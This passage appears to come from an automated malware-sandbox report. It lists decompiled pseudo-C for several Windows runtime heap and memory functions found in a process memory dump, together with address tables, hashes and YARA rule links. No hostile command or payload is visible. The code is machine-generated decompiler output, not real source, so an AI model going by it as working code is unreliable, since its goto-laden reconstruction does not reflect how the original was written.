				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x4dcd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E04D1FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4dc7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E04D1B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04CF4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E04CDCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E04D1B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E04D1F380(_t67 + 0xc, 0x4cb5138, 0x10) == 0) {
								 *0x4dc60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04D04F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04D04E70(0x4dc86b0, 0x4d05690, 0, 0) != 0) {
					_t46 = E04CDCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                                            0x04d04d3b
                                                                                            0x04d04d4d
                                                                                            0x04d04d53
                                                                                            0x04d04d58
                                                                                            0x04d04d65
                                                                                            0x04d04d6c
                                                                                            0x04d04d71
                                                                                            0x04d04d77
                                                                                            0x04d04d7f
                                                                                            0x04d04d8c
                                                                                            0x04d04d8e
                                                                                            0x04d04dad
                                                                                            0x04d04db0
                                                                                            0x04d04db7
                                                                                            0x04d04db8
                                                                                            0x04d04db9
                                                                                            0x04d04dba
                                                                                            0x04d04dbb
                                                                                            0x04d04dc1
                                                                                            0x04d04dc8
                                                                                            0x04d04dcc
                                                                                            0x04d04dd5
                                                                                            0x04d04dde
                                                                                            0x04d04ddf
                                                                                            0x04d04de0
                                                                                            0x04d04de1
                                                                                            0x04d04de6
                                                                                            0x04d04de7
                                                                                            0x04d04de9
                                                                                            0x04d04df3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d46c7c
                                                                                            0x04d46c8a
                                                                                            0x04d46c8a
                                                                                            0x04d46c9d
                                                                                            0x04d46ca7
                                                                                            0x04d46cac
                                                                                            0x04d46cb2
                                                                                            0x04d46cb9
                                                                                            0x00000000
                                                                                            0x04d46cbf
                                                                                            0x04d46cbf
                                                                                            0x00000000
                                                                                            0x04d46cbf
                                                                                            0x04d46cb9
                                                                                            0x04d04dfb
                                                                                            0x04d46ccf
                                                                                            0x04d46cd3
                                                                                            0x04d04e32
                                                                                            0x04d04e39
                                                                                            0x04d46ce0
                                                                                            0x04d46cf2
                                                                                            0x04d46cf2
                                                                                            0x04d46ce0
                                                                                            0x04d04e3f
                                                                                            0x04d04e41
                                                                                            0x04d04e51
                                                                                            0x04d04e51
                                                                                            0x04d04e03
                                                                                            0x04d04e03
                                                                                            0x04d04e09
                                                                                            0x04d04e0f
                                                                                            0x04d04e57
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d04e1b
                                                                                            0x04d04e30
                                                                                            0x04d04e5b
                                                                                            0x04d04e5b
                                                                                            0x00000000
                                                                                            0x04d04e30
                                                                                            0x04d04e11
                                                                                            0x04d04e11
                                                                                            0x04d04e16
                                                                                            0x00000000
                                                                                            0x04d04e16
                                                                                            0x04d04e01
                                                                                            0x00000000
                                                                                            0x04d04e01
                                                                                            0x04d04da5
                                                                                            0x04d46c6b
                                                                                            0x00000000
                                                                                            0x04d04dab
                                                                                            0x04d04dab
                                                                                            0x00000000
                                                                                            0x04d04dab

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 43bfb5ea8bd8b2c89599feb35d50ad5ceda7706980e60f21b9b342617c91f568
                                                                                            • Instruction ID: 75f357365eb66f1189c80a812e40ba39c83a41499cc29973f6f3e0a18d8c3fca
                                                                                            • Opcode Fuzzy Hash: 43bfb5ea8bd8b2c89599feb35d50ad5ceda7706980e60f21b9b342617c91f568
                                                                                            • Instruction Fuzzy Hash: 82418371B40318AFEB21DF14DD90FAAB7AAFB45714F0480AAEA459B280D774FD44CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D04BAD, Relevance: .1, Instructions: 131COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 85%
                                                                                            			E04D04BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x4dcd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E04CDCC50(_t86);
					L11:
					return E04D1B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x4dc8504
				E04CF2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E04D1FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E04D1B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L04CF4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E04CDCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x4dc8504
								E04CEFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04D04F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                                            0x04d04bad
                                                                                            0x04d04bbf
                                                                                            0x04d04bc2
                                                                                            0x04d04bc6
                                                                                            0x04d04bcd
                                                                                            0x04d04bd9
                                                                                            0x04d467fe
                                                                                            0x04d46800
                                                                                            0x04d04ccc
                                                                                            0x04d04ccd
                                                                                            0x04d04cb7
                                                                                            0x04d04cc9
                                                                                            0x04d04cc9
                                                                                            0x04d04bdf
                                                                                            0x04d04be5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d04beb
                                                                                            0x04d04bef
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d04bf5
                                                                                            0x04d04bf9
                                                                                            0x04d04c06
                                                                                            0x04d04c0b
                                                                                            0x04d04c17
                                                                                            0x04d04c1c
                                                                                            0x04d04c1f
                                                                                            0x04d04c25
                                                                                            0x04d04c33
                                                                                            0x04d04c3d
                                                                                            0x04d04c40
                                                                                            0x04d04c43
                                                                                            0x04d04c47
                                                                                            0x04d04c4d
                                                                                            0x04d04c53
                                                                                            0x04d04c54
                                                                                            0x04d04c55
                                                                                            0x04d04c56
                                                                                            0x04d04c5b
                                                                                            0x04d04c5c
                                                                                            0x04d04c63
                                                                                            0x04d04c6b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d46776
                                                                                            0x04d46784
                                                                                            0x04d46784
                                                                                            0x04d4679f
                                                                                            0x04d467a7
                                                                                            0x04d467af
                                                                                            0x04d467ce
                                                                                            0x00000000
                                                                                            0x04d467b1
                                                                                            0x04d467b7
                                                                                            0x04d467b8
                                                                                            0x04d467c1
                                                                                            0x04d467d3
                                                                                            0x04d467d9
                                                                                            0x04d467dd
                                                                                            0x04d04c94
                                                                                            0x04d04c94
                                                                                            0x04d04c98
                                                                                            0x04d04c9c
                                                                                            0x04d04ca3
                                                                                            0x04d467f4
                                                                                            0x04d467f4
                                                                                            0x04d04cb5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d04cb5
                                                                                            0x04d04c79
                                                                                            0x04d04c7e
                                                                                            0x04d04c89
                                                                                            0x04d04c8b
                                                                                            0x04d04c8f
                                                                                            0x04d04c8f
                                                                                            0x00000000
                                                                                            0x04d04c89
                                                                                            0x04d467c3
                                                                                            0x00000000
                                                                                            0x04d467c3
                                                                                            0x04d467af
                                                                                            0x04d04c73
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aa02b8c21608ed3f471d1d951ade70f1e71f74356116f8842b11a968459502dc
                                                                                            • Instruction ID: fef42819d2975ef91cdccd89ef930b838bffa4bd69dde875fbe80ac50676194d
                                                                                            • Opcode Fuzzy Hash: aa02b8c21608ed3f471d1d951ade70f1e71f74356116f8842b11a968459502dc
                                                                                            • Instruction Fuzzy Hash: 2941A535A002289BDB21DF64C940FEA77B5FF85710F0141A5EA49AB240DB78FE84CF94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CE8A0A, Relevance: .1, Instructions: 120COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 94%
                                                                                            			E04CE8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x4dcd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E04D1B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E04CEE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x4cb1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04D01DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04D13C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E04CE8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                                            0x04ce8a0a
                                                                                            0x04ce8a1c
                                                                                            0x04ce8a23
                                                                                            0x04ce8a2e
                                                                                            0x04ce8a30
                                                                                            0x04ce8a36
                                                                                            0x04ce8a3c
                                                                                            0x04ce8a3e
                                                                                            0x04ce8a4a
                                                                                            0x04ce8a52
                                                                                            0x04ce8a9c
                                                                                            0x04ce8aae
                                                                                            0x04ce8a58
                                                                                            0x04ce8a5e
                                                                                            0x04ce8a6a
                                                                                            0x04ce8a6f
                                                                                            0x04ce8a75
                                                                                            0x04ce8a7d
                                                                                            0x04ce8a85
                                                                                            0x04ce8a86
                                                                                            0x04ce8a89
                                                                                            0x04ce8a93
                                                                                            0x04ce8a99
                                                                                            0x04ce8a9b
                                                                                            0x00000000
                                                                                            0x04ce8aaf
                                                                                            0x04ce8abe
                                                                                            0x04ce8ac3
                                                                                            0x04ce8acb
                                                                                            0x04ce8ad7
                                                                                            0x04ce8ae0
                                                                                            0x04ce8af1
                                                                                            0x00000000
                                                                                            0x04ce8af1
                                                                                            0x04ce8acd
                                                                                            0x04ce8ad5
                                                                                            0x04ce8afb
                                                                                            0x04ce8afd
                                                                                            0x04ce8aff
                                                                                            0x04ce8b07
                                                                                            0x04ce8b22
                                                                                            0x04ce8b24
                                                                                            0x04ce8b2a
                                                                                            0x04ce8b2e
                                                                                            0x04ce8b3f
                                                                                            0x04ce8b78
                                                                                            0x04ce8b41
                                                                                            0x04ce8b52
                                                                                            0x04ce8b54
                                                                                            0x04ce8b5c
                                                                                            0x04ce8b74
                                                                                            0x04ce8b74
                                                                                            0x04ce8b5c
                                                                                            0x04ce8b3f
                                                                                            0x04ce8b5e
                                                                                            0x04ce8b61
                                                                                            0x04ce8b64
                                                                                            0x04ce8b64
                                                                                            0x04ce8b6c
                                                                                            0x04ce8b6c
                                                                                            0x04ce8b11
                                                                                            0x04d39cd5
                                                                                            0x04d39cd5
                                                                                            0x04ce8b17
                                                                                            0x04ce8b1a
                                                                                            0x04ce8b1a
                                                                                            0x00000000
                                                                                            0x04ce8ad5
                                                                                            0x04ce8a89

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d68194ab130e7b46d006308a21ce6b3952930b3dbd314bd23c81bb2c962e1e2a
                                                                                            • Instruction ID: 1572d35b4ba12ed44e445f42b7b296edb335c6665621ec06b5cbaf0d60a80f44
                                                                                            • Opcode Fuzzy Hash: d68194ab130e7b46d006308a21ce6b3952930b3dbd314bd23c81bb2c962e1e2a
                                                                                            • Instruction Fuzzy Hash: A3417FB1A002289BDB24EF56DC88AB9B3F6FF44300F1045EAD81997251E770AE80DF60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D9AA16, Relevance: .1, Instructions: 120COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04D9AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E04D9ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E04D9AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E04D9AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E04D7CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L04CF77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E04CF7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04D9131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E04D7CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                                                            0x04d9aa1f
                                                                                            0x04d9aa21
                                                                                            0x04d9aa23
                                                                                            0x04d9aa2b
                                                                                            0x04d9aa30
                                                                                            0x04d9aa36
                                                                                            0x04d9aa39
                                                                                            0x04d9aa42
                                                                                            0x04d9aa75
                                                                                            0x04d9aa7a
                                                                                            0x04d9aa7c
                                                                                            0x04d9aa7c
                                                                                            0x04d9aa88
                                                                                            0x04d9aa8a
                                                                                            0x04d9aa8f
                                                                                            0x04d9ab02
                                                                                            0x04d9ab04
                                                                                            0x04d9aa99
                                                                                            0x04d9aaa8
                                                                                            0x04d9aaaf
                                                                                            0x04d9aab3
                                                                                            0x04d9aacc
                                                                                            0x04d9aad1
                                                                                            0x04d9aad6
                                                                                            0x04d9aae0
                                                                                            0x04d9aaf3
                                                                                            0x04d9aaf9
                                                                                            0x04d9aafe
                                                                                            0x04d9aafe
                                                                                            0x04d9aaf3
                                                                                            0x04d9aad6
                                                                                            0x04d9aab3
                                                                                            0x04d9ab07
                                                                                            0x04d9ab0a
                                                                                            0x04d9ab11
                                                                                            0x04d9ab23
                                                                                            0x04d9ab13
                                                                                            0x04d9ab1c
                                                                                            0x04d9ab1c
                                                                                            0x04d9ab2b
                                                                                            0x04d9ab44
                                                                                            0x04d9ab44
                                                                                            0x04d9ab51
                                                                                            0x04d9ab51
                                                                                            0x04d9aa44
                                                                                            0x04d9aa47
                                                                                            0x04d9aa4c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d9aa5a
                                                                                            0x04d9aa64
                                                                                            0x04d9aa72
                                                                                            0x00000000
                                                                                            0x04d9aa66
                                                                                            0x04d9aa66
                                                                                            0x04d9aa68
                                                                                            0x04d9aa6a
                                                                                            0x00000000
                                                                                            0x04d9aa6a

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                            • Instruction ID: e95f922f73fc9ab4cf23ff89c35b9eb985007d225f7a194088cf3c306eaf5797
                                                                                            • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                            • Instruction Fuzzy Hash: 7131B033F001A56BEF159B65CC45BAFF7EAEB84718F058069E805E7351DB74AD00C660
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D9FDE2, Relevance: .1, Instructions: 116COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 76%
                                                                                            			E04D9FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E04D9FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E04DA0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E04CF7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E04D91608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E04DA2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E04D9C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E04D9DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E04CF7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E04D9A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                                                            0x04d9fde7
                                                                                            0x04d9fde8
                                                                                            0x04d9fdec
                                                                                            0x04d9fdee
                                                                                            0x04d9fdf5
                                                                                            0x04d9fdf7
                                                                                            0x04d9fdfc
                                                                                            0x04d9fe19
                                                                                            0x04d9fe22
                                                                                            0x04d9fe26
                                                                                            0x04d9fec6
                                                                                            0x04d9fecd
                                                                                            0x04d9fed5
                                                                                            0x04d9fee7
                                                                                            0x04d9fed7
                                                                                            0x04d9fee0
                                                                                            0x04d9fee0
                                                                                            0x04d9feef
                                                                                            0x04d9ff00
                                                                                            0x04d9ff02
                                                                                            0x04d9ff07
                                                                                            0x04d9ff07
                                                                                            0x00000000
                                                                                            0x04d9feef
                                                                                            0x04d9fe33
                                                                                            0x04d9fe55
                                                                                            0x04d9fe59
                                                                                            0x04d9fe5b
                                                                                            0x04d9fe5e
                                                                                            0x04d9fe69
                                                                                            0x04d9fe6d
                                                                                            0x04d9fe6d
                                                                                            0x04d9fe69
                                                                                            0x04d9fe35
                                                                                            0x04d9fe41
                                                                                            0x04d9fe41
                                                                                            0x04d9fe79
                                                                                            0x04d9fe8b
                                                                                            0x04d9fe7b
                                                                                            0x04d9fe84
                                                                                            0x04d9fe84
                                                                                            0x04d9fe93
                                                                                            0x00000000
                                                                                            0x04d9fea8
                                                                                            0x04d9feba
                                                                                            0x00000000
                                                                                            0x04d9feba
                                                                                            0x04d9fdfe
                                                                                            0x04d9fe01
                                                                                            0x04d9fe02
                                                                                            0x04d9fe08
                                                                                            0x04d9ff0c
                                                                                            0x04d9ff14
                                                                                            0x04d9ff14

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                            • Instruction ID: 560fcc838bb4c18452bf4d62a807df1e961dd07a20614aff458a37387910d53a
                                                                                            • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                            • Instruction Fuzzy Hash: 4231D232700641AFEB229F68C844F6ABBEAFB85754F18455DE986CB742DA74FC41C720
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D9EA55, Relevance: .1, Instructions: 111COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 70%
                                                                                            			E04D9EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E04CF2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E04D9E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E04CDF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E04CEFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E04D9AFDE( &_v12,  &_v16);
